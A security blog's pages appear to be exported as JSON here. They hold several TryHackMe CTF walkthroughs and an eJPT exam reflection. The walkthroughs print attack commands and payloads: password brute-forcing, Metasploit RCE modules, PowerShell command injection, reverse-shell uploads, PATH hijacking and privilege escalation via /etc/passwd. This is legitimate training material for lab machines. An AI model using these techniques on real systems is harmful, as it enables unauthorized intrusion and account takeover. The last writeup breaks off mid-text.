[{"content":" Join the Intel Network Get technical \u0026 security writeups and other articles delivered straight to your inbox.\nSubscribe \u0026copy; 2026 5kullk3r. All rights reserved.\nClassification: Security Research // Educational Only Legal Notice The writeups, exploit research, technical analyses, and security content published on this platform are intended strictly for educational purposes, CTF challenges, authorized security research, and defensive learning. All views expressed are personal and do not represent the positions, endorsements, or strategies of any employer, client, or affiliated organization. Liability Disclaimer This platform does not endorse unauthorized access, malicious activity, disclosure of confidential information, or any form of illegal or unethical conduct. Any misuse of the information shared here falls outside its intended purpose and is strictly not tolerated. All materials are provided on an \"as-is\" basis, and users are solely responsible for their actions. The author assumes no liability for misuse, damages, or unauthorized application of the content published on this site. \u0026copy; 2026 5kullk3r\n[ SYSTEM: LOCKED ]\n","date":"9 May 2026","externalUrl":null,"permalink":"/","section":"Home","summary":"","title":"Home","type":"page"},{"content":" Hello everyone! This is a easy rated subscriber room from the TryHackMe platform titled “LOOKUP” LOOKUP- TRY HACK ME- ROOMHello everyone! This is a easy rated subscriber room from the TryHackMe platform titled “LOOKUP”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nOrigin of the word “Lookup” in my opinionPhase 1: Reconnaissance and Authentication BypassInitial Scanning and Vhost ConfigurationThe investigation begins with a full-port scan and standard directory brute-forcing.\nnmap -sC -sV -p- 10.80.153.15 -T 5Port 22 (SSH): Standard remote access.Port 80 (HTTP): The primary entry point.I mapped the main domain to my local resolution file:\nsudo nano /etc/hosts10.80.153.15 lookup.thmVisiting lookup.thm reveals a login page.\nStandard SQL injection and default credentials failed\nCredential HarvestingAfter performing user enumeration (using a specialized Python script to parse error responses), I identified two valid system usernames: admin and jose.\nCredits: To the author \u0026amp; ChatGPT ( it’s not mine and I came across this when I was stuck )I targeted the jose account for a dictionary attack.\nhydra -l jose -P rockyou.txt lookup.thm http-post-form \"/login.php:username=admin\u0026amp;password=^PASS^:Wrong\" -VResult: Successfully cracked the password:\npassword123Phase 2: Web Exploitation and Path HijackingExploiting elFinder RCELogging in revealed a sub-application hosted on a different virtual host and trying to access it wasn’t working.\nI updated the hosts file again to include files.lookup.thm\nThis page hosted elFinder, a web file manager known for specific Remote Code Execution (RCE) vulnerabilities.\nSeeing the credentials in credentials.txt and trying to SSH in, it fails\nHeading right away to Metasploit:\nmsfconsolesearch elfinderuse exploit/multi/http/elfinder_archive_cmd_injection (EDB-ID 46481)set RHOSTS files.lookup.thmset LHOST tun0runThis provided a shell as the web user.\nHowever, I could not yet access user.txt or the sensitive .passwordsfile in the home directory.\nSUID Privilege Escalation: /usr/sbin/pwmI searched for SUID binaries to find a path toward the user think.\nI identified a custom binary:\n/usr/sbin/pwmRunning the binary revealed that it executes the id command internally.\nHowever, it does not use an absolute path, making it vulnerable to Path Hijacking.\nLateral Movement via Path ManipulationTo exploit this, I created a malicious “id” script and manipulated the system’s PATH variable so the SUID binary would execute my script instead of the real system utility.\necho -e '#!/bin/bash\\necho \"uid=1000(think) gid=1000(think) groups=1000(think)\"' \u0026gt; /tmp/idchmod +x /tmp/idexport PATH=/tmp:$PATHThen,\n/usr/sbin/pwmExecuting the hijacked binary revealed a list of names/strings.\nI saved these into a local file, list.txt, suspecting they were potential passwords for the think user.\nPhase 3: SSH Access and Root EscalationCracking SSH for ‘think’Performing a targeted SSH brute-force attack using the file list.txt\nhydra -l think -P list.txt ssh://10.80.160.219:22Credentials found:\nthink:josemario.AKA(think)ssh think@10.80.160.219cat user.txtUser Flag:\n38375fb4dd8baa2b2039ac03d92b820eFinal Escalation via ‘look’Checking for administrative privileges\nsudo -lDiscovery: (ALL) /usr/bin/look\n#The look command is designed to search for strings in a file.#When run with sudo, it can be used to read any file on the system, including those restricted to root.Following GTFOBins methodology\nLFILE=/root/root.txtsudo look '' \"$LFILE\"This successfully output the contents of the protected root file.\n5a285a9f257e45c68bb6c9f9f57d18e8CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub:\nhttps://github.com/5kullk3r\nFeel free to drop a follow and connect with me on TryHackMe as well:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"9 May 2026","externalUrl":null,"permalink":"/writeups/tryhackme/lookup-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LOOKUP- TRY HACK ME- ROOM","type":"writeups"},{"content":" Welcome to my security labs and walkthroughs directory. Select a platform below to view recent machine breakdowns:\nJoin the Intel Network Get technical \u0026 security writeups and other articles delivered straight to your inbox.\nSubscribe ","date":"9 May 2026","externalUrl":null,"permalink":"/writeups/","section":"Security Labs \u0026 Writeups","summary":"","title":"Security Labs \u0026 Writeups","type":"writeups"},{"content":"","date":"9 May 2026","externalUrl":null,"permalink":"/writeups/tryhackme/","section":"Security Labs \u0026 Writeups","summary":"","title":"TryHackMe Labs","type":"writeups"},{"content":" Hello everyone! This is an easy rated room from the TryHackMe platform titled “LOOKBACK” LOOKBACK - TRY HACK ME- ROOMHello everyone! This is an easy rated room from the TryHackMe platform titled “LOOKBACK”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nThe OG meme and the real story of school daysPhase 1: Reconnaissance and Web EnumerationInitial Scanning and Service MappingThe investigation begins with a full-port scan to identify the network footprint.\nnmap -sC -sV -p- 10.82.181.239 -T 5Port 80/443 (HTTP/HTTPS)Port 3389 (RDP)The presence of standard Windows management and web ports suggests a target running a Windows Server environment with specialized web services.\nEnumerating Sub Directories:\ngobuster dir -u http://10.82.181.239 -w /usr/share/wordlists/dirb/common.txt -t 5 --exclude-length=0I see: /test and /ecp.\n/ecp (Exchange Control Panel) is a strong indicator that this server is running Microsoft Exchange.\nVisiting the victim IP\nAccessing the Test PortalI visited the /test directory, which presented a secondary login portal.\nUsing the classic admin:admin combination, I successfully bypassed the login.\nThe First Flag:\nThe landing page immediately revealed:\nTHM{Security_Through_Obscurity_Is_Not_A_Defense}Phase 2: PowerShell Command InjectionIdentifying the Injection VectorThe test portal featured a button intended to generate BitLocker paths.\nBy analyzing the output format, I determined the backend was likely executing PowerShell commands to fetch system information.\nI attempted to break the intended command string to inject my own logic.\n') ; dir #('The ') closes the existing string/function, the ; acts as a command separator, dir is the payload to list the directory, and #(' comments out the remaining trailing characters of the original command.\nDirectory Enumeration:\n') ; dir C:\\Users\\dev\\desktop #('I identified two high-interest files: user.txt \u0026amp; TODO.txt\nData Exfiltration and Hint RetrievalUsing the same injection technique, I utilized the type command (PowerShell's equivalent to cat) to read the sensitive files.\n') ; type C:\\Users\\dev\\desktop\\user.txt #('We get the User Flag:\nTHM{Stop_Reading_Start_Doing}The Critical Hint: ') ; type C:\\Users\\dev\\desktop\\TODO.txt #('\nThe note mentioned a “Security Update for MS Exchange” and a specific email address: dev-infrastracture-team@thm.local.\nThis is a classic “Known-User” prerequisite for Exchange exploits.\nPhase 3: Exploiting Microsoft Exchange (ProxyShell)Leveraging Metasploit for RCEThe combination of an unpatched Exchange server and a valid internal email address makes the system highly vulnerable to ProxyShell (CVE-2021–34473), which allows for unauthenticated Remote Code Execution.\nmsfconsolesearch exchange proxyuse exploit/windows/http/exchange_proxyshell_rce (##or similar ProxyLogon module).set RHOSTS 10.82.181.239set LHOST tun0set EMAIL dev-infrastracture-team@thm.localrunThe exploit successfully bypassed authentication and dropped me into a SYSTEM shell.\nClaiming the Final FlagWith full administrative control, I navigated the filesystem to retrieve the final proof of compromise.\nI checked the standard administrative directories.\ncd C:\\Users\\Administrators\\Documentstype flag.txtWe get Root Flag:\nTHM{Looking_Back_Is_Not_Always_Bad}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub:\nhttps://github.com/5kullk3r\nAlso, do follow me on Tryhackme:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"19 April 2026","externalUrl":null,"permalink":"/writeups/tryhackme/lookback-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LOOKBACK - TRY HACK ME- ROOM","type":"writeups"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/articles/certifications/","section":"Security Research \u0026 Articles","summary":"","title":"Certifications","type":"articles"},{"content":" Now For those of you who who have played this legendary game or seen the movies you already know the infamous sound in the heading Ch-Ch-Ch… Pass-Pass-Pass: My Friday the 13th Journey to eJPTNow For those of you who who have played this legendary game or seen the movies you already know the infamous sound in the heading\nBut for those who don’t …. what are y’all even doing ?\nGo show Jason Vorhees some love and see the movie or try the game haha\nI’m excited to share that I officially passed the eJPT (eLearnSecurity Junior Penetration Tester) certification!\nAnd want to write this as a way to reflect on the journey.\nThe “Why”: Testing My LimitsAfter passing CompTIA Security+, I realized I wanted something more.\nI didn’t want another standard, theoretical exam where I just checked boxes; I wanted to see if I could actually do it.\nAfter spending significant time in various practice labs and CTF rooms, I wanted to put myself in a hands-on situation to see if I was truly capable of handling a professional-grade practical challenge.\nThat’s when I discovered the eJPT v2.\nDisclaimer: The views and experiences shared in this article are purely my own. The eJPT is a certification where opinions on preparation, resources, and difficulty vary. This is simply my candid, personal journey, and if sharing my story helps even one person on their path, I’m genuinely happy.Preparing for the Exam: The 8-to-6 GrindWorking a demanding role meant my “9-to-5” was actually an 8-to-6.\nFinding time to study wasn’t easy.\nI had to make time wherever I could — sometimes in the early morning before anyone was up, and often late at night after a long day at the office.\nI set a hard deadline for myself, which forced me to be more efficient.\nI started finishing my daily tasks faster so I could jump straight into my practice materials.\nMy biggest piece of advice? Take extensive notes.\nI documented every scenario and every “Aha!” moment during my prep. Those notes became my ultimate weapon when the clock started ticking.\nThe Strategy:The INE course is often cited as the gold standard for eJPT prep, boasting 150 hours of video lectures.\nWhile it’s recommended to go through every lesson, I took a different approach: I skimmed the theory lightly and jumped straight into the CTFs to solve them.\nHowever, life happens. I was traveling and lost access to the official materials after a couple of weeks, so I had to get resourceful.\nI curated a list of TryHackMe rooms aligned with the course topics. Covering and understanding them is usually enough to build the necessary flow and confidence for the actual exam environment.\nResources:This is my github repo I created with some resources covering the eJPT which you all can see if you need some reference:\nhttps://github.com/5kullk3r/eJPTv2\nSome of the TryHackMe Rooms:\nhttps://tryhackme.com/room/wordpresscve202129447https://tryhackme.com/room/investigatingwindowshttps://tryhackme.com/room/ultratech1https://tryhackme.com/room/icehttps://tryhackme.com/room/posterhttps://tryhackme.com/room/colddboxeasyhttps://tryhackme.com/room/toolsrushttps://tryhackme.com/room/goldeneyehttps://tryhackme.com/room/relevanthttps://tryhackme.com/room/gamingserverhttps://tryhackme.com/room/surferhttps://tryhackme.com/room/intermediatenmaphttps://tryhackme.com/room/exposehttps://tryhackme.com/room/publisherhttps://tryhackme.com/room/chocolatefactoryhttps://tryhackme.com/room/jokerctfhttps://tryhackme.com/room/sourcehttps://tryhackme.com/room/picklerickhttps://tryhackme.com/room/basicpentestingjthttps://tryhackme.com/room/h4ckedAlso, some knowledge on the following without which it will be hard:\nnmapdirbburpmysqlftp \u0026amp; SSHsqlmaphydraenum4linuxmetasploitwordpress \u0026amp; drupal ( CMS )RDPThe Exam: Surviving the Legendary Friday the 13thI started my exam on Friday, March 13th.\nHonestly, I think Jason would have approved of the timing.\nWhile he was busy with his machete at the lake, I was busy stalking my targets through rounds of enumeration on the network.\nThe only real difference? My “kills” resulted in a passing score, not a horror sequel!\nWhile I can’t disclose technical specifics, here was my tactical schedule:\nDay 1 (Friday the 13th):I kicked off at 10:00 AM.I took solid breaks to reset and clear my mind.By the evening — much like Jason at the end of a movie — I had already appeared right where I needed to be, securing two major milestones.I finally stopped at 11:00 PM for some much-needed rest.Day 2 (The 14th):I resumed at 09:30 AM and secured my final goals by the morning.I spent the afternoon revising every single answer before finally hitting “Submit” at 2:15 PM.Final ThoughtsUnlike other certifications, the eJPT doesn’t feel like a standard CTF; it’s a structured and scoped pentest.\nIt forces you to understand the “why” behind every attack.\nWhether it was identifying a specific Windows Server version or exploiting a CMS, the devil was truly in the details.\nIf you’re a professional balancing a job and wondering if you can make the jump into something new: Set a deadline, trust your notes, and take breaks.\nMy Final Score was 82%, while it was a great experience I still have a lot to work on\nI’m grateful to have this under my belt, but I’m far from done.\nI’m ready to get my hands even dirtier for the next endeavor!\nI’m currently selecting my next goal and am open to recommendations .\nI’m happy to answer any questions about my preparation in the comments below.\nAll the best to everyone planning to take it up — you’ve got this!\nAlso, you can find all of my writeups and future ones on my GitHub:\nhttps://github.com/5kullk3r/eJPTv2\nAlso, do follow me on Tryhackme:\n5kullk3rTryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your…tryhackme.comCheers!\nP.S Apologies for the delayed post as I was wrapping up the exam and getting back on track 😬 ","date":"4 April 2026","externalUrl":null,"permalink":"/articles/certifications/ch-ch-ch-pass-pass-pass-my-friday-the-13th-journey-to-ejpt/","section":"Security Research \u0026 Articles","summary":"","title":"Ch-Ch-Ch… Pass-Pass-Pass: My Friday the 13th Journey to eJPT","type":"articles"},{"content":"Welcome to my research directory. Select a sector below to view recent deep dives and operational documentation:\nCERTIFICATIONS Milestone Logs \u0026 Strategies\nSECURITY RESEARCH Threat Analysis Logs\nTECHNISCH Hardware \u0026 HID Labs\nJoin the Intel Network Get technical \u0026 security writeups and other articles delivered straight to your inbox.\nSubscribe ","date":"4 April 2026","externalUrl":null,"permalink":"/articles/","section":"Security Research \u0026 Articles","summary":"","title":"Security Research \u0026 Articles","type":"articles"},{"content":" Hello everyone! This is an medium rated room from the TryHackMe platform titled “ROAD” ROAD- TRY HACK ME- ROOMHello everyone! This is an medium rated room from the TryHackMe platform titled “ROAD”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nProbably the only thing I remember from English Lessons xDPhase 1: Reconnaissance and Authentication Bypass (IDOR)Initial Scanning and Service MappingThe investigation begins with a full-port scan to identify the exposed attack surface.\nnmap 10.80.187.159 -sV -sC -v -p- -T 5The Results:\nPort 22 (SSH): Standard remote access.Port 80 (HTTP): The primary web server hosting “Sky Couriers.”Directory Brute-Forcing:\ngobuster dir -u http://10.80.187.159 -w /usr/share/wordlists/dirb/common.txt -t 5Discovered Locations:\n/assets/phpMyAdmin/v2Exploiting Insecure Direct Object Reference (IDOR)I registered a new account on the /v2 portal to inspect the internal functionality.\nWhile exploring the profile settings, I noted a restricted message:\n\"only admin has access to this feature. Please drop an email to admin@sky.thm\". This provided us with a target email address.\nThe dashboard included a password reset feature.\nI captured the password reset request in Burp Suite.\nBy intercepting the POST request, I modified the uname parameter from my own email to admin@sky.thm\nThe server processed the request based on the parameter value rather than the session identity, effectively resetting the Administrator’s password.\nI successfully logged in as the Administrator using the newly set credentials.\nPhase 2: Web Exploitation and Database ForensicsRemote Code Execution (RCE) via File UploadAs the Administrator, I had access to a profile image upload feature.\nI uploaded a PHP reverse shell. While the UI didn’t provide a direct link, the Burp Suite response headers/source code revealed the storage path:\nDirectory listing was disabled on /v2/profileimages/, but by manually navigating to my specific filename, I triggered the shell.\nListener:\nnc -lvnp 2233Trigger: http://10.80.187.159/v2/profileimages/php-reverse-shell.php\ncat /home/webdeveloper/user.txtWe get User Flag:\n63191e4ece37523c9fe6bb62a5e64d45MongoDB Post-ExploitationI needed to escalate to the user webdeveloper.\nI checked the running processes to identify sensitive services.\nps -efrevealed that MongoDB and MySQL were running.\nI accessed MongoDB to search for stored credentials.\nmongoshow databases;use backup;db.user.find()We see a document containing credentials for the user webdeveloper.\nCredentials:\nwebdeveloper : BahamasChapp123!@#Phase 3: Privilege Escalation to RootPoliKit (pkexec) ExploitationWith the discovered credentials, I established a stable SSH session. Checking sudo -l showed a custom utility (), but I turned to a more direct method of escalation involving PolKit.\nAttempting to run pkexec /bin/bash usually requires an interactive GUI-based authentication agent.\nSince we are in a headless SSH session, we must manually handle the TTY agent.\nThe Method:\nOpen two SSH sessions as webdeveloper.\nSession 1: Get the Process ID (PID) using\necho $$Session 2: Initialize a TTY agent to handle the authentication for that PID:\npkttyagent --process [PID_FROM_SESSION_1]Back at Session 1: Execute the escalation:\npkexec \"/bin/bash\"Session 2: Provide the password:\nBahamasChapp123!@#.Claiming the Final FlagThe authentication was successfully handled by the second session, granting a root shell in the first session.\nBACK AT 1st SESSION:cd /rootcat root.txtRoot Flag:\n3a62d897c40a815ecbe267df2f533acCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can.\nAlso, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nAlso, do follow me on Tryhackme:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"22 March 2026","externalUrl":null,"permalink":"/writeups/tryhackme/road-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"ROAD- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is an hard rated room from the TryHackMe platform titled “URANIUM CTF” URANIUM CTF- TRY HACK ME- ROOMHello everyone! This is an hard rated room from the TryHackMe platform titled “URANIUM CTF”\nThis room is classified as hard and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nLiterally the political talk globally and learnt this thanks to the stuxnet research. If you aren’t aware of stux, feel free to check out my article covering itPhase 1: Reconnaissance and SMTP ExploitationInitial Scanning and Vhost SetupThe investigation begins with a full-port scan. The presence of an open SMTP port is the primary lead for initial access.\nnmap -sC -sV -p- 10.81.145.20 -T 5Port 25 (SMTP): Used for sending emails.Port 80 (HTTP): Hosting the Uranium Coin website.Based on hints, I mapped the IP to the domain:\nsudo nano /etc/hosts10.81.145.20 uranium.thmGaining a Foothold via Email AttachmentA hint on twitter suggested that the user hakanbey processes applications sent via email. Specifically, we can send a file named application which the system likely executes or parses.\nI created a file named application containing a bash reverse shell.\nUsing the sendemail utility, I targeted the internal user.\nsendemail -t hakanbey@uranium.thm -f thm@thm.com -s 10.81.145.20 -u \"Hi\" -m \"here\" -a application -o tls=noOpen the listener on the side and we see the server processed the attachment and executed my shell.\ncat user_1.txtWe get User 1 Flag:\nthm{2aa50e58fa82244213d5438187c0da7c}Phase 2: Network Forensics and Lateral MovementAnalyzing the Network LogsInside Hakanbey’s home directory, I found a chat binary (chat_with_kral4) that required a password.\nI checked /var/wwwand found a packet capture (.pcap) file.\nI hosted the file using Python:\npython3 -m http.serverIn our local system we get the file:\nI opened hakanbey_network_log.pcap in Wireshark.\nFollowing the TCP Stream on the first few packets revealed a plaintext string being passed.\nThe chat password was MBMD1vdpjg3kGv6SsIz56VNG\nRunning ./chat_with_kral4 and entering the password revealed Hakanbey's system password in the conversation:\nMys3cr3tp4sw0rDMoving to User: Kral4With valid credentials, I moved toward the next user.\nsudo -lrevealed that Hakanbey could run /bin/bash as the user kral4.\nPivoting-\nsudo -u kral4 /bin/bashcat /home/kral4/user_2.txtWe get User 2 Flag:\nthm{804d12e6d16189075db2d45449aeda5f}Phase 3: Privilege Escalation via File ManipulationExploiting /bin/ddLet’s get LinPeass in here :\nSeeing the results of LinPeass , I found interesting binaries and discovered that kral4 had access to /bin/dd\nThe Vulnerability: dd can be used to read files that the user otherwise cannot access.\nI used dd to read the restricted web_flag.txt\n/bin/dd if=/var/www/html/web_flag.txtEscalation to Root (The Nano/Passwd Method)A mail file in /var/mail/kral4 hinted at using nano in the home folder to fix the website's index.html.\nThis suggested a scheduled task (cron job) might be running as root to check that file.\nI copied nano to the home directory as suggested.\nBy gaining a SUID copy of nano, we can edit the /etc/passwd file to elevate our user's permissions.\nThe Edit:\n./nano /etc/passwdI located the line for hakanbey: hakanbey:x:1000:1000...\nNow,\nI changed the UID and GID to 0:0 (the root identifiers).\nUpdated Line:\nhakanbey:x:0:0:hakanbey:/home/hakanbey:/bin/bashClaiming the Final FlagAfter saving the changes, the system now recognized hakanbey as having root-level privileges.\nsu - hakanbey #(Password: Mys3cr3tp4sw0rD).cat /root/root.txtWe get the Root Flag:\nthm{81498047439cc0426bafa1db5da699cd}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub:\nhttps://github.com/5kullk3r\nAlso, do follow me on Tryhackme:\nhttps://tryhackme.com/p/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"11 March 2026","externalUrl":null,"permalink":"/writeups/tryhackme/uranium-ctf-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"URANIUM CTF- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a easy rated room from the TryHackMe platform titled “EXPOSE” EXPOSE- TRY HACK ME- ROOMHello everyone! This is a easy rated room from the TryHackMe platform titled “EXPOSE”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nEveryone atleast once in their life lolPhase 1: Service Enumeration and Web DiscoveryComprehensive Nmap ScanThe investigation begins with a thorough port scan.\nSince the victim IP did not respond to standard browser requests on port 80, a full-port scan was necessary to discover where the services were actually hiding.\nStart with a nmap scan:\nnmap 10.81.136.134 -sV -sC -v -Pn -p-I see ports 21 (FTP), 22 (SSH), 53 (DNS), 1337 (HTTP), and 1883 (MQTT) open\nThe presence of port 1337 is a strong indicator of a web service running on a non-standard port, which is often used to hide administrative or development portals.\nInitial Enumeration (FTP and Web)I first attempted to access the FTP service using default anonymous credentials to see if any configuration files or notes were left behind.\nLet’s try accessing through FTP using default creds anonymous:anonymous\nftp 10.81.136.134but I see nothing that is of any use\nWith FTP being a dead end, I shifted focus to the web service on port 1337 and began directory brute-forcing using a common wordlist.\nChecking hidden subdirectory:\ngobuster dir -u http://10.81.136.134:1337 -w /usr/share/wordlists/dirb/common.txtWe see: /admin, /index.php, and /phpmyadmin\nVisiting http://10.81.136.134:1337 shows a page titled EXPOSED\nVisiting http://10.81.136.134:1337/admin shows a login page; however, exploring it reveals that the login button does not function, suggesting it might be a decoy or a broken asset.\nPhase 2: Exploiting SQL InjectionAdvanced Fuzzing and SQLi IdentificationSince the initial admin page was non-functional, I tried changing the wordlist to uncover more obscured directories.\nTrying out with other wordlists:\ngobuster dir -u http://10.81.136.134:1337 -w /usr/share/wordlists/dirb/big.txt -t 4We see /admin_101\nChecking this new path, I see a specific username already present in the field: hacker@root.thm\nThis presented a perfect opportunity to test for SQL injection.\nI captured the login request in Burp Suite to analyze the interaction between the front end and the database.\nI see the request body format: email=hacker%40root.thm\u0026amp;password=\nSignificantly, the response reveals the backend query: SELECT * FROM user WHERE email = 'hacker@root.thm'\nAutomated Data Extraction with SQLMapThe reflected SQL query confirmed the vulnerability.\nI saved the intercepted request as req.req and used sqlmap to dump the database contents. In the terminal:\nsqlmap -r req.req --dbs --batchWe see the database name expose, which immediately hints back to the webpage title we saw earlier\nsqlmap -r req.req -p 'password, email' -D expose --tablesWe see 2 tables: user and config\nI then dumped the contents from the user table to search for usable credentials.\nsqlmap -r req.req -p 'password, email' --batch -D expose -T user --columns --dumpWe see the password:\nVeryDifficultPassword!!#@#@!#!@#1231Attempting to log in with this password returns a message saying “we are at capacity,” which effectively makes this path useless for direct access.\nI pivoted to the config table to see if it contained any system-level information.\nsqlmap -r req.req -p 'password, email' --batch -D expose -T config --columns --dumpThis dump reveals two hidden paths and a password:\n/file1010111/index.php with the credential easytohack/upload-cv00101011/index.phpPhase 3: LFI to Remote Code Execution (RCE)Parameter Fuzzing and Local File Inclusion (LFI)I accessed the first hidden path found in the config table.\nAccess:\nhttp://10.81.136.134:1337/file1010111/index.php\nUse password easytohack to get in\nThe page provides a hint regarding parameter fuzzing hiding the DOM\nInspecting the page source and structure further hints at using a GET parameter.\nI tested this for Local File Inclusion (LFI) by attempting to read the system’s user list.\nAccessing the /etc/passwd file: http://10.81.136.134:1337/file1010111/index.php?file=/etc/passwdWhile inspecting the output, the username zeamkish caught my eye\nBypass Upload RestrictionsRecalling the second hidden path from the database, /upload-cv00101011/index.php.\nI navigated there and saw a hint that the necessary parameter starts with the letter \"z\".\nThis confirms that zeamkish is the correct target.\nThe upload form only permits .png files, so I implemented an extension bypass.\nFirst, I renamed my PHP reverse shell file to end in .png\nKeeping Burp Suite intercept active, I uploaded the file\nIn the captured Burp request, I edited the filename back to .php and forwarded the packet\nI then needed to find where the file was stored.\nInspecting the upload page after the success message revealed a directory: /upload_thm_1001.\nAccessing the upload directory:\nhttp://10.81.136.134:1337/upload-cv00101011/upload_thm_1001/I see my reverse shell file sitting there\nBack in the terminal, I opened a listener:\nnc -lvnp 2233I clicked the file on the webpage and successfully caught the shell\nPhase 4: Privilege EscalationUser Access and SSH PersistenceOnce I had a shell as the web user, I explored the home directories to find a way to stabilize the connection.\ncd homecd zeamkishcat ssh_cres.txtWe see the SSH credentials:\neasytohack@123Using these credentials, I logged in via SSH for a much more stable and functional terminal environment.\nssh zeamkish@10.81.136.134cat flag.txtAnd we get the user flag:\nTHM{USER_FLAG_1231_EXPOSE}Root Escalation via SUID NanoFinally, I began looking for a way to escalate to root.\nsudo -l did not allow any attempts, so I shifted to searching for binaries with the SUID bit set.\nfind / -perm -4000 -type f 2\u0026gt;/dev/nullI see /usr/bin/nano in the list\nI consulted GTFOBins for a nano-based SUID escape. This allows us to break out of the editor into a root-level shell.\nfind . -exec /bin/sh -p \\; -quitThis escalates our privilege\nwhoami (this confirms we are now root)cd /rootcat flag.txtAnd, we get root flag :\nTHM{ROOT_EXPOSED_1001}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"7 March 2026","externalUrl":null,"permalink":"/writeups/tryhackme/expose-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"EXPOSE- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a easy rated subscriber room from the TryHackMe platform titled “SURFER” SURFER- TRY HACK ME- ROOMHello everyone! This is a easy rated subscriber room from the TryHackMe platform titled “SURFER”\nThis room is classified as easy and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nKeep this in mind as the remaining 10 months of 2026 come lolPhase 1: Enumeration and Initial AccessNmap Scan and Service IdentificationWe begin by initiating an Nmap scan to identify open ports and services on the target machine.\nStart with nmap scan:\nnmap 10.80.189.192 -sV -sC -vWe see 22 (SSH) and 80 (HTTP) open\nWe navigate to the victim’s IP address in the browser.\nA manual inspection of the source code reveals nothing useful, so we check for common hidden files.\nChecking robots.txt we see /backup/chat.txt\nChecking it out we see the hint for the username and password thanks to Kate\nBypassing the LoginThe landing page presents a login prompt.\nThe chat hint suggested credentials\nSo trying admin:admin and it works\nPhase 2: Identifying the SSRF VulnerabilityDiscovering Internal AssetsOnce logged in, we explore the application’s features and documentation.\nScrolling through the page we see the export2pdf feature\nWe also see mention of internal/admin.php\nAttempting to access http://10.80.189.192/internal/admin.php directly results in an error message stating it can only be accessed locally.\nThis is a clear indicator that the server is configured to trust requests coming from itself (localhost).\nExploiting SSRF via Burp SuiteThe export2pdf functionality is a prime target for SSRF because the server must \"fetch\" content to convert it into a PDF document.\nWe use Burp Suite to intercept and modify this request.\nOpening Burp Suite to capture the request\nWe capture the POST request by clicking “exporttopdf” and send it to the Repeater\nIn the Repeater, we modify the URL parameter to point to the local loopback address.\nChanging the URL with the internal ip: http://127.0.0.1/internal/admin.php\nAnd now we send the request\nTo view the rendered content of the server’s internal response, we use Burp’s “Request in Browser” feature.\nHover your mouse over the response and right clickClick Request in browser → In original sessionCopy the linkNow head to the browser and paste the link and reload the page\nSuccess! The page 